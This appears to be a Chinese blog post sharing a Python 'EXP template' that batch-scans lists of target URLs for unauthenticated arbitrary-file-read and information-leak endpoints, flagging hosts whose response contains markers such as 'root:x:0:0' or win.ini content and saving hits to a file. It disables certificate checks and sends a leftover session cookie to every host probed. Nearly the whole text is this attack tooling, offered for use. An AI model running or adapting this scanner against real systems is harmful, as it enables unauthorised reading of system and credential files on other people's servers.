任意文件读取、未授权访问及信息泄露GET型EXP模版
站长 • 2024-02-29 11:19 • 131 次点击 • 技术文章
import requests
import argparse
from datetime import datetime
import time
import re
# Silence urllib3 warnings (the InsecureRequestWarning that the verify=False
# requests in poc() would otherwise print once per target).  Note this only
# hides the warning; certificate verification is still off for every probe.
requests.packages.urllib3.disable_warnings()
# ANSI escape sequences used to highlight the banner and confirmed hits.
RED_BOLD = "\033[1;31m"
RESET = "\033[0m"
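def usage():
    """Print the (Chinese) usage banner in bold red.

    The banner names the script as ``任意文件读取+未授权.py`` and shows the two
    invocation forms: ``-u URL`` for a single target and ``-f FILE`` for a
    list of targets.  It only *reads* the module-level RED_BOLD/RESET
    constants, so no ``global`` declaration is needed (the original ones were
    redundant).
    """
    text = '''
使用方法:
单个 python3 任意文件读取+未授权.py -u url[例 http://127.0.0.1:8080]
批量 python3 任意文件读取+未授权.py -f filename
开始检测................................
'''
    print(f"{RED_BOLD}{text}{RESET}")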
# proxies = {'http': 'http://127.0.0.1:10808'}  # optional: uncomment and pass proxies=proxies to requests.get() to route every probe through a local intercepting proxy (the original line was missing the closing quote)
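def save_file(url, path='result.txt'):
    """Append ``url`` plus a newline to the hit log.

    Args:
        url: The probe URL that produced a confirmed hit.
        path: File to append to.  Defaults to ``result.txt`` in the current
            working directory, which is what the rest of the script expects;
            the parameter exists so the writer can be pointed elsewhere
            (e.g. in tests) without changing callers.

    Returns:
        None.  The file is created if missing and never truncated.
    """
    with open(path, mode='a', encoding='utf-8') as fh:
        fh.write(url + '\n')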
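def poc(check_url, flag):
    """Probe one target for the unauthenticated file-read / info-leak endpoint.

    Sends a single GET to ``check_url`` + ``probe_path`` with a browser-like
    header set and reports a hit when the response is HTTP 200 *and* contains
    ``keyword``.  A hit is printed in red, counted in the module-level ``num``
    and appended to ``result.txt`` through ``save_file``; a miss or a network
    error is only printed.

    Args:
        check_url: Target base URL including scheme, e.g.
            ``http://127.0.0.1:8080``.  The probe path is concatenated to it
            verbatim, so it should not end with a slash if the path starts
            with one.
        flag: 1 when called from single-target mode, 0 from batch mode.  Kept
            for interface compatibility; this function does not read it.

    Returns:
        None.  Results surface via stdout, ``num`` and ``result.txt``.

    Template notes -- fill these in before running:
        * ``probe_path`` and ``keyword`` are empty placeholders.  An empty
          keyword is contained in every string, so the unfilled template
          reports every host that answers 200 as "vulnerable".  Pick a marker
          that cannot appear in a normal page (``root:x:0:0`` rather than
          ``root``, which also shows up in ordinary HTML/JS).
        * The Cookie header carries a fixed JSESSIONID and application
          flags that appear to be left over from an earlier target.  It is
          sent to *every* host probed, which both leaks that session id to
          third parties and can skew results; drop or replace it per target.
        * ``verify=False`` is deliberate (self-signed certs on targets) and
          only affects these requests.

    Fixes over the original:
        * ``num`` was only initialised by run(); in single-target mode a real
          hit raised NameError on ``num += 1``.  The broad ``except
          Exception`` then swallowed it and printed the host as dead, and the
          hit was never saved.  The counter is now initialised on first use
          and only network errors are caught.
    """
    global num
    now_poc = datetime.now()
    # run() sets num = 0 but main() never did for the -u path; be safe here.
    if "num" not in globals():
        num = 0

    probe_path = ""  # unauthorised / arbitrary-file-read endpoint, e.g. starts with "/"
    keyword = ""     # marker proving the read worked, e.g. "root:x:0:0" or "[fonts]" (win.ini)
    url1 = check_url + probe_path
    # To probe a second path, build url2 = check_url + "<path>" the same way,
    # request it in the try block below and add a second elif branch.

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        # TODO(review): hard-coded session cookie -- see docstring; remove or set per target.
        'Cookie': 'language=zh; style=1; EnableAESLogin=0; maintitle=%u4E3B%u52A8%u5B89%u5168%u76D1%u63A7%u4E91%u5E73%u53F0; isPolice=0; name=value; JSESSIONID=FFA216A30B39FD49BA0613D4DC7C6A4D'
    }

    try:
        # verify=False on purpose: targets commonly present self-signed certs.
        response1 = requests.get(url1, headers=headers, timeout=5, verify=False)
    except requests.RequestException:
        # Timeout, refused connection, TLS/handshake failure, bad URL, ...
        # Only transport errors are treated as "dead"; programming errors now
        # propagate instead of being misreported as an unreachable host.
        print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\tVocal,死站!')
        return

    if response1.status_code == 200 and keyword in response1.text:
        print(f'{RED_BOLD}[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\tvocal出货了!{RESET}')
        print(url1)
        num += 1
        print(f"挖到{num}个了")
        save_file(url1)
    else:
        print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t没洞,泥煤的这谁顶得住啊!')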
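def run(filepath):
    """Batch mode: probe every target listed in ``filepath``, one per line.

    Resets the module-level hit counter ``num`` to 0, then calls ``poc`` once
    per non-blank line.  Lines that already start with ``http://`` or
    ``https://`` are used as-is; anything else is assumed to be a bare host
    and prefixed with ``http://``.

    Args:
        filepath: Path to a UTF-8 text file of targets (host, host:port or
            full URL), one per line.  Blank lines are skipped.

    Returns:
        None.

    Fixes over the original:
        * The file handle was never closed; it is now opened with ``with``.
        * Scheme detection used ``'http' in u`` (substring anywhere, and the
          ``elif 'https' in u`` branch was unreachable), so a target such as
          ``example.com/httpd`` was passed through without a scheme.  It now
          checks the prefix.
        * A blank line used to be probed as the URL ``http://``.
    """
    global num
    num = 0
    flag = 0  # batch-mode marker for poc(); poc does not read it
    with open(filepath, "r", encoding="utf-8") as fh:
        targets = [line.strip() for line in fh]
    for target in targets:
        if not target:
            continue
        poc(_with_scheme(target), flag)


def _with_scheme(target):
    """Return ``target`` unchanged if it starts with http:// or https://,
    otherwise prefixed with ``http://``."""
    if target.lower().startswith(("http://", "https://")):
        return target
    return "http://" + target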
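def main():
    """Parse the command line and dispatch to single-target or batch mode.

    ``-u URL`` probes one target through ``poc``; ``-f FILE`` probes every
    target in FILE through ``run``.  Any other combination (both options or
    neither) prints the usage banner again and exits.  The banner is always
    printed first, followed by a one-second pause, as in the original.

    The hit counter ``num`` is reset here so the single-target path does not
    depend on ``run()`` having initialised it (the original raised NameError
    on a hit in ``-u`` mode).
    """
    global num
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="任意文件读取+未授权 -u url")
    parser.add_argument("-f", "--file", help="任意文件读取+未授权 -f file")
    args = parser.parse_args()
    url = args.url
    filepath = args.file

    usage()
    time.sleep(1)
    num = 0

    if url is not None and filepath is None:
        poc(url, 1)  # flag=1: single-target mode
    elif url is None and filepath is not None:
        run(filepath)
    else:
        usage()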
# Entry point: only run the scanner when executed directly, not on import.
if __name__ == '__main__':
    main()